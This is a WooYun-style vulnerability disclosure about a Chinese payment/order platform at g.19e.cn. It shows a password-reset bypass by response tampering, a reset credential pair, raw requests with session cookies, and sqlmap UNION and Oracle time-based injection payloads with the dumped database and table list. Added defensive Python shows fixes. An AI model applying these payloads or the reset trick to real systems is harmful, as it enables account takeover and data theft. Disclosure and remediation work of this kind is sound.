WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2016-05-14: Details reported to the vendor; awaiting vendor handling
2016-05-16: Vendor confirmed; details disclosed to the vendor only
2016-05-26: Details disclosed to core white hats and domain experts
2016-06-05: Details disclosed to regular white hats
2016-06-15: Details disclosed to intern white hats
2016-06-30: Details disclosed to the public
While scanning the class C range of a certain site I came across this platform and tested it a bit; by the look of it there is a whole pile of further issues.
http://g.19e.cn/login/index.jsp
#Mobile number enumeration
Capture the request when the SMS verification code is fetched.
#Password reset: enter the username lijing, enter any verification code, capture the request
POST /smsAction_validateShortMessage.do?mobileNum=15516777178&dxyzm=1234 HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://g.19e.cn/zhmm/zhmm_index.jsp
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=jWY41CQuJZRZ9rhnY3zG.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Length: 0
Change the value in the returned response to 0.
lijing/wooyun
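The bypass above works because the client, not the server, decides whether the verification step passed: the reset continues as soon as the browser sees a "0" in the response, so editing that response is enough. The following is an added example, not code from the report or from the g.19e.cn application, of a reset flow whose authorization lives in server-side state. The class, method names and the five-attempt / five-minute limits are assumptions; the mobile number and the "1234" guess are taken from the request above.

```python
import hmac
import secrets
import time

# Hypothetical server-side password-reset flow (constructed for illustration,
# not the g.19e.cn application's code). Whether the reset goes through is
# decided by state the server holds, so editing the status value in the
# validateShortMessage response changes nothing.

CODE_TTL_SECONDS = 300   # assumed lifetime of a code
MAX_ATTEMPTS = 5         # assumed guess budget per issued code


class PasswordResetService:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}    # mobile -> [code, expires_at, attempts]
        self._tokens = {}     # reset_token -> mobile
        self.passwords = {}   # mobile -> password (toy credential store)

    def send_code(self, mobile):
        """Step 1: mint a one-time code. It is returned here only so the test
        can play the SMS channel; a real service hands it to the SMS gateway
        and never echoes it to the HTTP client."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[mobile] = [code, self._clock() + CODE_TTL_SECONDS, 0]
        return code

    def validate_code(self, mobile, submitted):
        """Step 2: check the code server-side. Success is recorded as a
        server-side token; the HTTP response is only a hint for the UI."""
        entry = self._pending.get(mobile)
        if entry is None:
            return None
        code, expires_at, attempts = entry
        if self._clock() > expires_at or attempts >= MAX_ATTEMPTS:
            del self._pending[mobile]   # expired or too many guesses: start over
            return None
        entry[2] += 1
        if not hmac.compare_digest(code, submitted):
            return None
        del self._pending[mobile]       # a code is good for one use only
        token = secrets.token_urlsafe(32)
        self._tokens[token] = mobile
        return token

    def reset_password(self, mobile, token, new_password):
        """Step 3: only a token minted by validate_code authorizes the change."""
        if self._tokens.pop(token, None) != mobile:
            return False
        self.passwords[mobile] = new_password
        return True


def legitimate_flow(svc, mobile):
    code = svc.send_code(mobile)            # the user reads this from the phone
    token = svc.validate_code(mobile, code)
    return svc.reset_password(mobile, token, "new-password")


def tampered_client_flow(svc, mobile):
    """Model of the report's bypass: step 2 fails, the client tells itself the
    server said 0 anyway, and proceeds to step 3 with a made-up token."""
    svc.send_code(mobile)
    svc.validate_code(mobile, "1234")       # wrong guess, as in the request
    return svc.reset_password(mobile, "0", "forged-password")
```

The two flows differ only in what the server recorded at step 2; nothing the browser displays or forwards can substitute for the token, and the attempt counter keeps the six-digit code from being guessed on the same endpoint.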
#SQL injection: the injection points are the account name and employee name fields
POST /account_queryList.do HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://g.19e.cn/account_queryList.do
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=yzH9LFXcgruwY7a9qcgE.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

addCount=20&account.accountName=DSD&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
Place: POST
Parameter: account.accountName
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: addCount=20&account.accountName=1%' UNION ALL SELECT NULL,NULL,CHR(58)||CHR(122)||CHR(98)||CHR(117)||CHR(58)||CHR(117)||CHR(75)||CHR(78)||CHR(122)||CHR(119)||CHR(72)||CHR(77)||CHR(106)||CHR(112)||CHR(79)||CHR(58)||CHR(100)||CHR(116)||CHR(112)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: addCount=20&account.accountName=1%' AND 3610=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(120)||CHR(114)||CHR(81),5) AND '%'='&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
---
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] STOCKWEB
[*] SYS
[*] SYSTEM

Database: STOCKWEB
[60 tables]
+---------------------------+
| BXY                       |
| GHC_BAK_20130801          |
| GHC_BAK_20130802          |
| GHC_BIH_STAT_INFO         |
| GHC_BIH_STAT_RULE         |
| GHC_CHANNEL_AUTO_DISCOUNT |
| GHC_CHANNEL_DISCOUNT      |
| GHC_CHANNEL_INFO          |
| GHC_CHANNEL_MAPPING       |
| GHC_CHANNEL_SUPPORTCITY   |
| GHC_CHANNEL_SUPPORTMONEY  |
| GHC_CHANNEL_WARNINFO      |
| GHC_CODE_CITY             |
| GHC_CODE_PROVINCEINFO     |
| GHC_MODIFY_CHANNEL_LOG    |
| GHC_ORDER_COUNTERACT      |
| GHC_ORDER_INFO            |
| GHC_ORDER_INFO_CF201208   |
| GHC_ORDER_INFO_HIS        |
| GHG_CHANNEL_DETAIL        |
| GHG_CHANNEL_ERROR_INFO    |
| GHG_CHARGEORDER           |
| GHG_MANUAL_RECORDS        |
| GHG_REQUEST               |
| GHG_USERDETAIL            |
| GHK_CITY                  |
| GHK_DISTRICT              |
| GHK_LEVEL                 |
| GHK_LOWESTSALEPRICE       |
| GHK_LOWESTSALEPRICE_RULE  |
| GHK_MODIFYMONEY_REVIEW    |
| GHK_ORDER_REVIEW          |
| GHK_PRODUCT_TASK          |
| GHK_PROVINCE              |
| GHK_TRANSACTION_VOLUME    |
| GHM_ACCOUNT               |
| GHM_ADMIN                 |
| GHM_BAK_0811              |
| GHM_BAK_0812              |
| GHM_CHECKORDER            |
| GHM_DELETEUSERS           |
| GHM_DELETEUSERTEMP        |
| GHM_LETTER                |
| GHM_MENU                  |
| GHM_NOTICE                |
| GHM_OPERATELOG            |
| GHM_PHONE_VALIDATE        |
| GHM_REVELSALREFUND        |
| GHM_SAFESET               |
| GHM_USERREADNOTICELOG     |
| GHM_USERS                 |
| GHM_USERS_ALTERLOG        |
| GHM_USER_MENU             |
| GHM_WALLETINFO            |
| GH_NTY_TEMPLATE           |
| HF_ACCSEGMENT             |
| MSG_SEND_DETAIL_INFO      |
| MSG_SEND_MANAGER_INFO     |
| TEST_1015                 |
| T_USER                    |
+---------------------------+

Database: STOCKWEB
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| GHC_ORDER_INFO | 5270414 |
+----------------+---------+
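Both sqlmap payloads open with 1%' and close the string themselves, which is the signature of a search term pasted straight into a LIKE pattern. The following is an added example, not the application's code or anything from the report, of that pattern beside the bound-parameter form that closes it. GHM_ACCOUNT is a table name from the sqlmap output above; its columns, the sample rows, and the use of SQLite in place of the Oracle backend are assumptions made for the demonstration.

```python
import sqlite3

# Constructed demonstration of the account-list injection reported above and
# of the parameterized query that closes it. GHM_ACCOUNT is named on the page;
# its columns and rows here are invented. SQLite stands in for Oracle; the
# string-concatenation defect is the same on either.

SAMPLE_ROWS = [
    ("DSD", "Zhang San", 1),
    ("lijing", "Li Jing", 1),
    ("opsadmin", "Wang Wu", 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE GHM_ACCOUNT (ACCOUNTNAME TEXT, REALNAME TEXT, STATUS INTEGER)"
    )
    conn.executemany("INSERT INTO GHM_ACCOUNT VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_list_vulnerable(conn, account_name):
    """Mirrors what account_queryList.do evidently does: the search term is
    pasted into a LIKE pattern, so a quote inside it ends the literal."""
    sql = (
        "SELECT ACCOUNTNAME, REALNAME FROM GHM_ACCOUNT "
        f"WHERE ACCOUNTNAME LIKE '%{account_name}%'"
    )
    return conn.execute(sql).fetchall()


def like_pattern(term, escape="\\"):
    """Build a contains-pattern in which %, _ and the escape character from
    the user's term match literally instead of acting as LIKE wildcards."""
    escaped = (
        term.replace(escape, escape + escape)
        .replace("%", escape + "%")
        .replace("_", escape + "_")
    )
    return "%" + escaped + "%"


def query_list_safe(conn, account_name):
    """The term travels as a bound parameter and can never alter the SQL."""
    sql = (
        "SELECT ACCOUNTNAME, REALNAME FROM GHM_ACCOUNT "
        "WHERE ACCOUNTNAME LIKE ? ESCAPE '\\'"
    )
    return conn.execute(sql, (like_pattern(account_name),)).fetchall()


# Same shape as the report's second payload (1%' ... AND '%'='), reduced to a
# plain tautology so it runs against SQLite.
PROBE = "1%' OR '%'='"
```

Against the sample table the vulnerable function returns every row for PROBE while the safe one returns none, and both return the single DSD row for the ordinary search in the captured request. Escaping the LIKE metacharacters is a separate concern from injection: binding alone stops the query from being rewritten, while like_pattern stops a bare % from turning a search into a full table dump.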
Asking for 20 rank.
Severity: High
Vulnerability Rank: 13
Confirmed at: 2016-05-16 14:23
Confirmed that the vulnerability exists; a fix is in progress.
None